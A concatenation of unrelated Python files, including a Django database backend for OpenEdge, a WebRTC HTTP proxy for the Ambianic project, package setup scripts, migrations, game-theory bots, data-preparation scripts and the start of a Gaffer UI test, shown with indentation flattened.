print('Press Ctrl+C to stop.')
signal.pause()
# wait for all threads to finish
for t in train_threads:
t.join()
print('Now saving data. Please wait.')
saver.save(sess, EXPERIMENT_CHECKPOINT_DIR + '/' + 'checkpoint', global_step=global_t)
summary_writer.close()
|
from __future__ import print_function
import os.path
import sys
import re
import warnings
from django.db import connection, models
from django.db.backends.util import truncate_name
from django.core.management.color import no_style
from django.db.models.fields import NOT_PROVIDED
from django.db.utils import DatabaseError
from south.utils.py3 import string_types, text_type
#from OpenEdge.pyodbc import operations
from south.db import generic
class DatabaseOperations(generic.DatabaseOperations):
"""
OpenEdge implementation of database operations.
"""
backend_name = 'OpenEdge'
alter_string_set_type = 'ALTER COLUMN %(column)s TYPE %(type)s'
alter_string_set_null = 'ALTER COLUMN %(column)s DROP NOT NULL'
alter_string_drop_null = 'ALTER COLUMN %(column)s SET NOT NULL'
delete_check_sql = 'ALTER TABLE %(table)s DROP CONSTRAINT %(constraint)s'
add_column_string = 'ALTER TABLE %s ADD COLUMN %s;'
delete_unique_sql = "ALTER TABLE %s DROP CONSTRAINT %s"
delete_foreign_key_sql = 'ALTER TABLE %(table)s DROP CONSTRAINT %(constraint)s'
create_table_sql = 'CREATE TABLE %(table)s (%(columns)s)'
max_index_name_length = 32
drop_index_string = 'DROP INDEX %(index_name)s'
delete_column_string = 'ALTER TABLE %s DROP COLUMN %s CASCADE;'
create_primary_key_string = "ALTER TABLE %(table)s ADD CONSTRAINT %(constraint)s PRIMARY KEY (%(columns)s)"
delete_primary_key_sql = "ALTER TABLE %(table)s DROP CONSTRAINT %(constraint)s"
add_check_constraint_fragment = "ADD CONSTRAINT %(constraint)s CHECK (%(check)s)"
rename_table_sql = "ALTER TABLE %s RENAME TO %s;"
default_schema_name = "public"
# Features
allows_combined_alters = True
supports_foreign_keys = True
has_check_constraints = True
has_booleans = True
raises_default_errors = True
def column_sql(self, table_name, field_name, field, tablespace='', with_name=True, field_prepared=False):
"""
Creates the SQL snippet for a column. Used by add_column and add_table.
"""
# If the field hasn't already been told its attribute name, do so.
if not field_prepared:
field.set_attributes_from_name(field_name)
# hook for the field to do any resolution prior to it's attributes being queried
if hasattr(field, 'south_init'):
field.south_init()
# Possible hook to fiddle with the fields (e.g. defaults & TEXT on MySQL)
field = self._field_sanity(field)
try:
sql = field.db_type(connection=self._get_connection())
except TypeError:
sql = field.db_type()
if sql:
# Some callers, like the sqlite stuff, just want the extended type.
if with_name:
field_output = [self.quote_name(field.column), sql]
else:
field_output = [sql]
field_output.append('%s' % (not field.null and 'NOT NULL ' or ''))
if field.primary_key:
field_output.append('PRIMARY KEY')
elif field.unique:
# Just use UNIQUE (no indexes any more, we have delete_unique)
field_output.append('UNIQUE')
tablespace = field.db_tablespace or tablespace
if tablespace and getattr(self._get_connection().features, "supports_tablespaces", False) and field.unique:
# We must specify the index tablespace inline, because we
# won't be generating a CREATE INDEX statement for this field.
field_output.append(self._get_connection().ops.tablespace_sql(tablespace, inline=True))
sql = ' '.join(field_output)
sqlparams = ()
# if the field is "NOT NULL" and a default value is provided, create the column with it
# this allows the addition of a NOT NULL field to a table with existing rows
if not getattr(field, '_suppress_default', False):
if field.has_default():
default = field.get_default()
# If the default is actually None, don't add a default term
if default is not None:
# If the default is a callable, then call it!
if callable(default):
default = default()
default = field.get_db_prep_save(default, connection=self._get_connection())
default = self._default_value_workaround(default)
# Now do some very cheap quoting. TODO: Redesign return values to avoid this.
if isinstance(default, string_types):
default = "'%s'" % default.replace("'", "''")
# Escape any % signs in the output (bug #317)
if isinstance(default, string_types):
default = default.replace("%", "%%")
# Add it in
sql += " DEFAULT %s"
sqlparams = (default)
elif (not field.null and field.blank) or (field.get_default() == ''):
if field.empty_strings_allowed and self._get_connection().features.interprets_empty_strings_as_nulls:
sql += " DEFAULT ''"
# Error here would be nice, but doesn't seem to play fair.
#else:
# raise ValueError("Attempting to add a non null column that isn't character based without an explicit default value.")
if field.rel and self.supports_foreign_keys:
self.add_deferred_sql(
self.foreign_key_sql(
table_name,
field.column,
field.rel.to._meta.db_table,
field.rel.to._meta.get_field(field.rel.field_name).column
)
)
# Things like the contrib.gis module fields have this in 1.1 and below
if hasattr(field, 'post_create_sql'):
for stmt in field.post_create_sql(no_style(), table_name):
self.add_deferred_sql(stmt)
# In 1.2 and above, you have to ask the DatabaseCreation stuff for it.
# This also creates normal indexes in 1.1.
if hasattr(self._get_connection().creation, "sql_indexes_for_field"):
# Make a fake model to pass in, with only db_table
model = self.mock_model("FakeModelForGISCreation", table_name)
for stmt in self._get_connection().creation.sql_indexes_for_field(model, field, no_style()):
self.add_deferred_sql(stmt)
if sql:
return sql % sqlparams
else:
return None
@generic.invalidate_table_constraints
def create_unique(self, table_name, columns):
"""
Creates a UNIQUE index on the columns on the given table.
"""
if not isinstance(columns, (list, tuple)):
columns = [columns]
name = self.create_index_name(table_name, columns, suffix="_uniq")
cols = ", ".join(map(self.quote_name, columns))
self.execute('CREATE UNIQUE INDEX %s ON "%s" (%s)'%(name,table_name,cols))
return name
def _createSequence(self,table,column):
"""
Use django.db.backends.creation.BaseDatabaseCreation._digest
to create index name in Django style. An evil hack :(
"""
return self._get_connection().ops.autoinc_sql(table, column)
@generic.invalidate_table_constraints
def create_table(self, table_name, fields):
"""
Creates the table 'table_name'. 'fields' is a tuple of fields,
each repsented by a 2-part tuple of field name and a
django.db.models.fields.Field object
"""
if len(table_name) > 63:
print(" ! WARNING: You have a table name longer than 63 characters; this will not fully work on PostgreSQL or MySQL.")
# avoid default values in CREATE TABLE statements (#925)
for field_name, field in fields:
field._suppress_default = True
columns = [
self.column_sql(table_name, field_name, field)
for field_name, field in fields
]
self.execute(self.create_table_sql % {
"table": self.quote_name(table_name),
"columns": ', '.join([col for col in columns if col]),
})
self.execute(self._createSequence(table_name,'id')[0])
@generic.invalidate_table_constraints
def add_column(self, table_name, name, field, keep_default=True):
"""
Adds the column 'name' to the table 'table_name'.
Uses the 'field' paramater, a django.db.models.fields.Field instance,
to generate the necessary sql
@param table_name: The name of the table to add the column to
@param name: The name of the column to add
@param field: The field to use
"""
sql = self.column_sql(table_name, name, field)
if sql:
params = (
self.quote_name(table_name),
sql,
)
sql = self.add_column_string % params
self.execute(sql)
@generic.invalidate_table_constraints
def delete_table(self, table_name, cascade=True):
"""
Deletes the table 'table_name'.
"""
params = (self.quote_name(table_name), )
self.execute('DROP TABLE %s;' % params)
# Drop associated sequence
self.execute('DROP SEQUENCE PUB.%s_%s'%('ID',table_name[:self.max_index_name_length-3]))
|
from __future__ import absolute_import
# import apis into api package
from tiledb.cloud.rest_api.api.array_api import ArrayApi
from tiledb.cloud.rest_api.api.array_tasks_api import ArrayTasksApi
from tiledb.cloud.rest_api.api.favorites_api import FavoritesApi
from tiledb.cloud.rest_api.api.invitation_api import InvitationApi
from tiledb.cloud.rest_api.api.notebook_api import NotebookApi
from tiledb.cloud.rest_api.api.notebooks_api import NotebooksApi
from tiledb.cloud.rest_api.api.organization_api import OrganizationApi
from tiledb.cloud.rest_api.api.query_api import QueryApi
from tiledb.cloud.rest_api.api.sql_api import SqlApi
from tiledb.cloud.rest_api.api.stats_api import StatsApi
from tiledb.cloud.rest_api.api.tasks_api import TasksApi
from tiledb.cloud.rest_api.api.udf_api import UdfApi
from tiledb.cloud.rest_api.api.user_api import UserApi
# flake8: noqa
|
#!/usr/bin/env python
from setuptools import setup
setup(
name="ectou-metadata",
version="1.0.2",
description="Yet another EC2 instance metadata mocking service.",
url="https://github.com/monetate/ectou-metadata",
author='Monetate',
author_email='jjpersch@monetate.com',
license="MIT",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
keywords="aws instance metadata",
packages=[
'ectou_metadata',
],
install_requires=[
"boto3",
"bottle",
],
entry_points={
'console_scripts': [
'ectou_metadata = ectou_metadata.service:main',
],
},
test_suite="tests",
)
|
"""Register with PNP server and wait for remote peers to connect."""
# import argparse
import os
import asyncio
import sys
import json
import yaml
import aiohttp
from typing import Any
from pathlib import Path
from loguru import logger
# from aiortc import RTCIceCandidate, RTCSessionDescription
from peerjs.peer import Peer, PeerOptions
from peerjs.peerroom import PeerRoom
from peerjs.util import util, default_ice_servers
from peerjs.enums import ConnectionEventType, PeerEventType
from aiortc.rtcconfiguration import RTCConfiguration, RTCIceServer
print(sys.version)
peer = None
savedPeerId = None
# persisted config dict
AMBIANIC_PNP_HOST = 'ambianic-pnp.herokuapp.com' # 'localhost'
AMBIANIC_PNP_PORT = 443 # 9779
AMBIANIC_PNP_SECURE = True # False
DEFAULT_LOG_LEVEL = 'INFO'
config = {
'signaling_server': AMBIANIC_PNP_HOST,
'port': AMBIANIC_PNP_PORT,
'secure': AMBIANIC_PNP_SECURE,
'ice_servers': default_ice_servers,
'log_level': "INFO",
}
PEERID_FILE = '.peerjsrc'
if os.environ.get("PEERJS_PEERID_FILE"):
PEERID_FILE = os.environ.get("PEERJS_PEERID_FILE")
CONFIG_FILE = 'peerjs-config.yaml'
if os.environ.get("PEERJS_CONFIG_FILE"):
CONFIG_FILE = os.environ.get("PEERJS_CONFIG_FILE")
time_start = None
peerConnectionStatus = None
discoveryLoop = None
# aiohttp session reusable throghout the http proxy lifecycle
http_session = None
# flags when user requests shutdown
# via CTRL+C or another system signal
_is_shutting_down: bool = False
# async def _consume_signaling(pc, signaling):
# while True:
# obj = await signaling.receive()
# if isinstance(obj, RTCSessionDescription):
# await pc.setRemoteDescription(obj)
# if obj.type == "offer":
# # send answer
# await pc.setLocalDescription(await pc.createAnswer())
# await signaling.send(pc.localDescription)
# elif isinstance(obj, RTCIceCandidate):
# pc.addIceCandidate(obj)
# elif obj is None:
# print("Exiting")
# break
async def join_peer_room(peer=None):
"""Join a peer room with other local peers."""
# first try to find the remote peer ID in the same room
myRoom = PeerRoom(peer)
logger.debug('Fetching room members...')
peerIds = await myRoom.getRoomMembers()
logger.info('myRoom members {}', peerIds)
def _savePeerId(peerId=None):
assert peerId
global savedPeerId
savedPeerId = peerId
with open(PEERID_FILE, 'w') as outfile:
json.dump({'peerId': peerId}, outfile)
def _loadPeerId():
"""Load and reuse saved peer ID if there is one."""
global savedPeerId
conf_file = Path(PEERID_FILE)
if conf_file.exists():
conf = {}
with conf_file.open() as infile:
conf = yaml.load(infile, Loader=yaml.SafeLoader)
if conf is not None:
savedPeerId = conf.get('peerId', None)
else:
savedPeerId = None
def _loadConfig():
logger.info('Loading configuration')
global config
conf_file = Path(CONFIG_FILE)
exists = conf_file.exists()
if exists:
logger.info(f'Loading config from: {conf_file}')
with conf_file.open() as infile:
config = yaml.load(infile, Loader=yaml.SafeLoader)
else:
logger.info(f'Config file not found: {conf_file}')
# Set defaults
if config is None:
config = {}
if "signaling_server" not in config.keys():
config["signaling_server"] = AMBIANIC_PNP_HOST
if "port" not in config.keys():
config["port"] = AMBIANIC_PNP_PORT
if "secure" not in config.keys():
config["secure"] = AMBIANIC_PNP_SECURE
if "ice_servers" not in config.keys():
config["ice_servers"] = default_ice_servers
return exists
def _saveConfig():
global config
cfg1 = config.copy()
if 'peerId' in cfg1.keys():
del cfg1["peerId"]
with open(CONFIG_FILE, 'w') as outfile:
yaml.dump(cfg1, outfile)
def _setPnPServiceConnectionHandlers(peer=None):
assert peer
global savedPeerId
@peer.on(PeerEventType.Open)
async def peer_open(id):
logger.info('Peer signaling connection open.')
global savedPeerId
# Workaround for peer.reconnect deleting previous id
if peer.id is None:
logger.info('pnpService: Received null id from peer open')
peer.id = savedPeerId
else:
if savedPeerId != peer.id:
logger.info(
'PNP Service returned new peerId. Old {}, New {}',
savedPeerId,
peer.id
)
_savePeerId(peer.id)
logger.info('savedPeerId: {}', peer.id)
@peer.on(PeerEventType.Disconnected)
async def peer_disconnected(peerId):
global savedPeerId
logger.info('Peer {} disconnected from server.', peerId)
# Workaround for peer.reconnect deleting previous id
if not peer.id:
logger.debug('BUG WORKAROUND: Peer lost ID. '
'Resetting to last known ID.')
peer._id = savedPeerId
peer._lastServerId = savedPeerId
@peer.on(PeerEventType.Close)
def peer_close():
# peerConnection = null
logger.info('Peer connection closed')
@peer.on(PeerEventType.Error)
def peer_error(err):
logger.exception('Peer error {}', err)
logger.warning('peerConnectionStatus {}', peerConnectionStatus)
# retry peer connection in a few seconds
# loop = asyncio.get_event_loop()
# loop.call_later(3, pnp_service_connect)
# remote peer tries to initiate connection
@peer.on(PeerEventType.Connection)
async def peer_connection(peerConnection):
logger.info('Remote peer trying to establish connection')
_setPeerConnectionHandlers(peerConnection)
async def _fetch(url: str = None, method: str = 'GET') -> Any:
global http_session
if method == 'GET':
async with http_session.get(url) as response:
content = await response.read()
# response_content = {'name': 'Ambianic-Edge', 'version': '1.24.2020'}
# rjson = json.dumps(response_content)
return response, content
elif method == 'PUT':
async with http_session.put(url) as response:
content = await response.read()
return response, content
else:
raise NotImplementedError(
f'HTTP method ${method} not implemented.'
' Contributions welcome!')
async def _pong(peer_connection=None):
"""Respond to client ping."""
response_header = {
'status': 200,
}
header_as_json = json.dumps(response_header)
logger.debug('sending keepalive pong back to remote peer')
await peer_connection.send(header_as_json)
await peer_connection.send('pong')
async def _ping(peer_connection=None, stop_flag=None):
while not stop_flag.is_set():
# send HTTP 202 Accepted status code to inform
# client that we are still waiting on the http
# server to complete its response
ping_as_json = json.dumps({'status': 202})
await peer_connection.send(ping_as_json)
logger.info('webrtc peer: http proxy response to client ping. '
'Keeping datachannel alive.')
await asyncio.sleep(1)
def _setPeerConnectionHandlers(peerConnection):
@peerConnection.on(ConnectionEventType.Open)
async def pc_open():
logger.info('Connected to: {}', peerConnection.peer)
# Handle incoming data (messages only since this is the signal sender)
@peerConnection.on(ConnectionEventType.Data)
async def pc_data(data):
logger.debug('data received from remote peer \n{}', data)
request = json.loads(data)
# check if the request is just a keepalive ping
if (request['url'].startswith('ping')):
logger.debug('received keepalive ping from remote peer')
await _pong(peer_connection=peerConnection)
return
logger.info('webrtc peer: http proxy request: \n{}', request)
# schedule frequent pings while waiting on response_header
# to keep the peer data channel open
waiting_on_fetch = asyncio.Event()
asyncio.create_task(_ping(peer_connection=peerConnection,
stop_flag=waiting_on_fetch))
response = None
try:
logger.debug(f'Proxy forwarding HTTP request: {request}.')
response, content = await _fetch(**request)
logger.debug(f'Proxy received HTTP response: {response}.')
except Exception as e:
logger.exception('Error {} while fetching response'
' with request: \n {}',
e, request)
finally:
# fetch completed, cancel pings
waiting_on_fetch.set()
if not response:
response_header = {
# internal server error code
'status': 500
}
response_content = None
return
response_content = content
response_header = {
'status': response.status,
'content-type': response.headers.get('content-type', 'None'),
'content-length': len(response_content)
}
logger.info('Proxy fetched response with headers: \n{}', response.headers)
logger.info('Answering request: \n{} '
'response header: \n {}',
request, response_header)
header_as_json = json.dumps(response_header)
await peerConnection.send(header_as_json)
if (response.status != 204):
# HTTP status 204 means: Success. No content.
await peerConnection.send(response_content)
@peerConnection.on(ConnectionEventType.Close)
async def pc_close():
logger.info('Connection to remote peer closed')
async def pnp_service_connect() -> Peer:
"""Create a Peer instance and register with PnP signaling server."""
# Create own peer object with connection to shared PeerJS server
logger.info('creating peer')
# If we already have an assigned peerId, we will reuse it forever.
# We expect that peerId is crypto secure. No need to replace.
# Unless the user explicitly requests a refresh.
global savedPeerId
global config
logger.info('last saved savedPeerId {}', savedPeerId)
new_token = util.randomToken()
logger.info('Peer session token {}', new_token)
options = PeerOptions(
host=config['signaling_server'],
port=config['port'],
secure=config['secure'],
token=new_token,
config=RTCConfiguration(
iceServers=[RTCIceServer(**srv) for srv in config['ice_servers']]
)
)
peer = Peer(id=savedPeerId, peer_options=options)
logger.info('pnpService: peer created with id {} , options: {}',
peer.id,
peer.options)
await peer.start()
logger.info('peer activated')
_setPnPServiceConnectionHandlers(peer)
return peer
async def make_discoverable(peer=None):
"""Enable remote peers to find and connect to this peer."""
logger.debug('Enter peer discoverable.')
logger.debug('Before _is_shutting_down')
global _is_shutting_down
logger.debug('Making peer discoverable.')
while not _is_shutting_down:
logger.debug('Discovery loop.')
logger.debug('peer status: {}', peer)
try:
if not peer or peer.destroyed:
logger.info('Peer destroyed. Will create a new peer.')
peer = await pnp_service_connect()
elif peer.open:
await join_peer_room(peer=peer)
elif peer.disconnected:
logger.info('Peer disconnected. Will try to reconnect.')
await peer.reconnect()
else:
logger.info('Peer still establishing connection. {}', peer)
except Exception as e:
logger.exception('Error while trying to join local peer room. '
'Will retry in a few moments. '
'Error: \n{}', e)
if peer and not peer.destroyed:
# something is not right with the connection to the server
# lets start a fresh peer connection
logger.info('Peer connection was corrupted. Detroying peer.')
await peer.destroy()
peer = None
logger.debug('peer status after destroy: {}', peer)
await asyncio.sleep(3)
def _config_logger():
global config
if config:
log_level = config.get("log_level", "DEBUG")
else:
log_level = DEFAULT_LOG_LEVEL
logger.remove()
logger.add(sys.stdout, colorize=True, level=log_level, enqueue=True)
logger.info(f'Log level is: {log_level}')
async def _start():
global http_session
http_session = aiohttp.ClientSession()
global peer
logger.info('Calling make_discoverable')
await make_discoverable(peer=peer)
logger.info('Exited make_discoverable')
await logger.complete()
async def _shutdown():
global _is_shutting_down
_is_shutting_down = True
global peer
logger.debug('Shutting down. Peer {}', peer)
if peer:
logger.info('Destroying peer {}', peer)
await peer.destroy()
else:
logger.info('Peer is None')
# loop.run_until_complete(pc.close())
# loop.run_until_complete(signaling.close())
global http_session
await http_session.close()
@logger.catch
def main():
# args = None
# parser = argparse.ArgumentParser(description="Data channels ping/pong")
# parser.add_argument("role", choices=["offer", "answer"])
# parser.add_argument("--verbose", "-v", action="count")
# add_signaling_arguments(parser)
# args = parser.parse_args()
# if args.verbose:
logger.info('Calling _loadPeerId()')
_loadPeerId()
logger.info('After _loadPeerId()')
exists = _loadConfig()
logger.info('Calling _loadConfig()')
if not exists:
_saveConfig()
_config_logger()
logger.info('After _loadConfig()')
# add formatter to ch
# signaling = create_signaling(args)
# signaling = AmbianicPnpSignaling(args)
# pc = RTCPeerConnection()
# if args.role == "offer":
# coro = _run_offer(pc, signaling)
# else:
# coro = _run_answer(pc, signaling)
# run event loop
loop = asyncio.get_event_loop()
try:
logger.info('\n>>>>> Starting http-proxy over webrtc. <<<<')
loop.run_until_complete(_start())
loop.run_forever()
except KeyboardInterrupt:
logger.info('KeyboardInterrupt detected.')
finally:
logger.info('Shutting down...')
loop.run_until_complete(_shutdown())
loop.close()
logger.info('All done.')
if __name__ == "__main__":
main() |
"""empty message
Revision ID: 3bfc81510c43
Revises: 2505ad08a7d0
Create Date: 2020-08-12 12:12:22.439674
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '3bfc81510c43'
down_revision = '2505ad08a7d0'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('post', 'youtube_id')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('post', sa.Column('youtube_id', sa.VARCHAR(length=255), nullable=True))
# ### end Alembic commands ###
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
long_desc = '''
This package contains the mscgen_ Sphinx_ extension.
.. _mscgen: http://www.mcternan.me.uk/mscgen/
.. _Sphinx: http://sphinx.pocoo.org/
Allow mscgen-formatted Message Sequence Chart (MSC) graphs to be included in
Sphinx-generated documents inline. For example::
.. msc::
hscale = "0.5";
a,b,c;
a->b [ label = "ab()" ] ;
b->c [ label = "bc(TRUE)"];
c=>c [ label = "process()" ];
'''
requires = ['Sphinx>=0.6']
setup(
name='sphinxcontrib-mscgen',
version='0.4',
url='http://packages.python.org/sphinxcontrib-mscgen/',
download_url='http://pypi.python.org/pypi/sphinxcontrib-mscgen',
license='BOLA',
author='Leandro Lucarella',
author_email='llucax@gmail.com',
description='mscgen Sphinx extension',
long_description=long_desc,
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: Public Domain',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Documentation',
'Topic :: Utilities',
],
platforms='any',
packages=find_packages(),
include_package_data=True,
install_requires=requires,
namespace_packages=['sphinxcontrib'],
)
|
import numpy as np
from tg_config import *
def random_mistake(origin_func):
def wrapper(self, *args):
prob = np.random.randint(100)
if( prob < game_configs['mistake_prob']):
origin_result = origin_func(self, *args)
return -1 * origin_result
else:
origin_result = origin_func(self, *args)
return origin_result
return wrapper
class Bot(object):
def __init__(self, pos, total_num):
self.pos = pos
self.score = 0
self.opp_logs = {}
self.my_logs = {}
for i in range(total_num):
if i != self.pos:
self.opp_logs[str(i)] = []
self.my_logs[str(i)] = []
def strategy(self, opp_pos):
return np.random.randint(2)
#TODO different strategy can be added here
def print_score(self):
print("Player_%d (%s): %d" % (self.pos, self.__class__.__name__, self.score))
def print_my_logs(self):
for k,v in self.my_logs.items():
print('Player_%s: %s' % (k, str(v)))
def print_opp_logs(self):
for k,v in self.opp_logs.items():
print('Player_%s: %s' % (k, str(v)))
class Follower(Bot):
@random_mistake
def strategy(self, opp_pos):
opp_log = self.opp_logs[str(opp_pos)]
if opp_log:
return opp_log[-1]
else:
return -1
class Follower_2(Bot):
@random_mistake
def strategy(self, opp_pos):
opp_log = self.opp_logs[str(opp_pos)]
try:
if opp_log[-1] == opp_log[-2] == 1:
return 1
else:
return -1
except IndexError:
return -1
class Gambler(Bot):
@random_mistake
def strategy(self, opp_pos):
if 1 in self.opp_logs[str(opp_pos)]:
return 1
else:
return -1
class Pink(Bot):
@random_mistake
def strategy(self, opp_pos):
return -1
class Black(Bot):
@random_mistake
def strategy(self, opp_pos):
return 1
class Single_Mind(Bot):
@random_mistake
def strategy(self, opp_pos):
opp_log = self.opp_logs[str(opp_pos)]
my_log = self.my_logs[str(opp_pos)]
try:
if opp_log[-1] == -1:
return my_log[-1]
else:
return -1 * my_log[-1]
except IndexError:
return -1
class Sherlock(Bot):
@random_mistake
def strategy(self, opp_pos):
trial = [-1, 1, -1, -1]
opp_log = self.opp_logs[str(opp_pos)]
if len(opp_log) < 4:
return trial[len(opp_log)]
elif 1 in opp_log:
return opp_log[-1]
else:
return 1
|
from django.contrib import admin
from django.db.models import Count
from django.contrib.auth.admin import UserAdmin
import editor.models
admin.site.register(editor.models.SiteBroadcast)
admin.site.register(editor.models.Tip)
admin.site.register(editor.models.NewExam)
admin.site.register(editor.models.NewQuestion)
admin.site.register(editor.models.Theme)
admin.site.register(editor.models.Subject)
admin.site.register(editor.models.Topic)
admin.site.register(editor.models.AbilityFramework)
admin.site.register(editor.models.AbilityLevel)
class TaxonomyAdmin(admin.ModelAdmin):
fields = ['name','description']
admin.site.register(editor.models.Taxonomy,TaxonomyAdmin)
admin.site.register(editor.models.TaxonomyNode)
# allow users to be sorted by date joined
UserAdmin.list_display += ('date_joined',)
UserAdmin.list_filter += ('date_joined',)
class LicenceAdmin(admin.ModelAdmin):
list_display = ['name', 'short_name', 'can_reuse', 'can_modify', 'can_sell']
admin.site.register(editor.models.Licence, LicenceAdmin)
class ExtensionAdmin(admin.ModelAdmin):
list_display = ['name', 'location', 'public', 'author']
admin.site.register(editor.models.Extension, ExtensionAdmin)
class EditorTagAdmin(admin.ModelAdmin):
list_display = ['name', 'show_used_count', 'official']
actions = ['make_tag_official', 'merge_tags']
def get_queryset(self, request):
return editor.models.EditorTag.objects.annotate(used_count=Count('tagged_items'))
def show_used_count(self, instance):
return instance.used_count
show_used_count.admin_order_field = 'used_count'
show_used_count.short_description = 'Times used'
def make_tag_official(self, request, queryset):
queryset.update(official=True)
make_tag_official.short_description = 'Make official'
def merge_tags(self, request, queryset):
if len(queryset) == 1:
return
tags = list(queryset)
tags.sort(key=editor.models.EditorTag.used_count, reverse=True)
merged_tag = tags[0]
editor.models.TaggedItem.objects.filter(tag__in=tags[1:]).update(tag=merged_tag)
if queryset.filter(official=True).exists():
merged_tag.official = True
merged_tag.save()
queryset.exclude(pk=merged_tag.pk).delete()
self.message_user(request, "Tags %s merged into '%s'" % (', '.join("'%s'" % t.name for t in tags), merged_tag.name))
merge_tags.short_description = 'Merge tags'
admin.site.register(editor.models.EditorTag, EditorTagAdmin)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Justin Cunningham
import pandas as pd
import re
import sys
import argparse
from .demutate_corpus import DemutateText
from .utils import pad_sentence, add_window
reg = re.compile("[^a-záéíóú]")
def create_parser(subparsers=None):
if subparsers:
parser = subparsers.add_parser('demutate-window',
description="creates a file with demutated tokens surrounded by a window of "
"tokens to be used in training")
else:
parser = argparse.ArgumentParser('demutate-window',
description="creates a file with demutated tokens surrounded by a window of "
"tokens to be used in training")
parser.add_argument(
'--input', '-i', type=argparse.FileType('r'), default=sys.stdin,
metavar='PATH',
help='Input file'
)
parser.add_argument(
'--output', '-o', type=argparse.FileType('w'), default=sys.stdout,
metavar='PATH',
help='Output file'
)
parser.add_argument(
'--mask', '-p', type=str,
metavar='STRING', default='<mask>',
help='Mask Token (Default: <mask>)'
)
parser.add_argument(
'--language', '-l', type=str,
metavar='STRING',
help='Language of text you wish to demutate'
)
parser.add_argument(
'--window', '-w', type=int,
metavar='VALUE',
help='The amount of tokens on either side of the central token'
)
def demutate_with_window(input_text, win_len, language, output_file=None, mask='<mask>'):
"""Returns DF Object of demutated dataset
:param input_text: Path to text file
:param win_len: Length of the window on each side
:param language: Language of the text
:param output_file: Path to output file
:param mask: Mask token
:return: Create a dataframe object with dataset to train a new neural network
"""
final = []
if not isinstance(input_text, list):
input_text = [input_text]
demutation = DemutateText(language)
corp_list, label_list = demutation.demutate_corpus(input_text)
for item in corp_list:
sentence = str(item)
split_sent = sentence.split()
zero_sentence_len = len(split_sent) - 1
for token_id, token in enumerate(split_sent):
window, lsl, rsl = add_window(split_sent, token, win_len, token_id, zero_sentence_len)
if len(window) != (2 * win_len) + 1:
window = pad_sentence(window, win_len, lsl, rsl, mask)
final.append(' '.join(window))
df = pd.DataFrame(zip(final, label_list), columns=['sentence', 'label'])
if output_file:
df.to_csv(output_file, index=False)
else:
return df
|
import base64
import hashlib
from os.path import join
from random import Random
import pandas as pd
from config import DATA_DIR, RANDOM_SEED
from modapt.utils import save_json
from tqdm import tqdm
RNG = Random()
RNG.seed(RANDOM_SEED)
_SUBSAMPLE_SIZE = 10000
_POLARITY_TO_LABEL = {"positive": "pos", "negative": "neg"}
df = pd.read_csv(
join(DATA_DIR, "sentiment", "raw", "imdb", "IMDB Dataset.csv"),
)
idxs = RNG.sample(range(len(df)), _SUBSAMPLE_SIZE)
dataset_dict = {}
for idx in tqdm(idxs):
row = df.iloc[idx]
text = row[0]
polarity = row[1]
polarity = _POLARITY_TO_LABEL[polarity]
hasher = hashlib.sha1(text.encode())
review_id = base64.urlsafe_b64encode(hasher.digest()[:6]).decode()
print(review_id, polarity, text)
new_id = f"imdb.{review_id}"
dataset_dict[new_id] = {"id": new_id, "text": text, "polarity": polarity}
save_json(dataset_dict, join(DATA_DIR, "sentiment", "imdb.json"))
|
import json
import logging
from django.db import connection
from django.http import HttpResponse
from rest_framework.response import Response
from rest_framework.views import APIView
from .database import Database
logger = logging.getLogger("django")
class TestView(APIView):
def get(self, request):
try:
database = Database()
with connection.cursor() as cursor:
cursor.execute("select * from TestTable")
data = database.dictfetchall(cursor)
return Response({
"data": data
})
except Exception as ex:
# Log error message to file
logger.error('error occurs ' + json.dumps(ex.args))
# Response returned with failed status and message error
return Response({
"data": "error"
})
|
# Generated by Django 2.0.1 on 2018-03-22 15:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('django_workflow', '0009_auto_20180226_1444'),
]
operations = [
migrations.RemoveField(
model_name='transitionlog',
name='object_state',
),
]
|
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import weakref
import IECore
import Gaffer
import GafferUI
import GafferTest
import GafferUITest
class GraphEditorTest( GafferUITest.TestCase ) :
def testCreateWithExistingGraph( self ) :
s = Gaffer.ScriptNode()
s["add1"] = GafferTest.AddNode()
s["add2"] = GafferTest.AddNode()
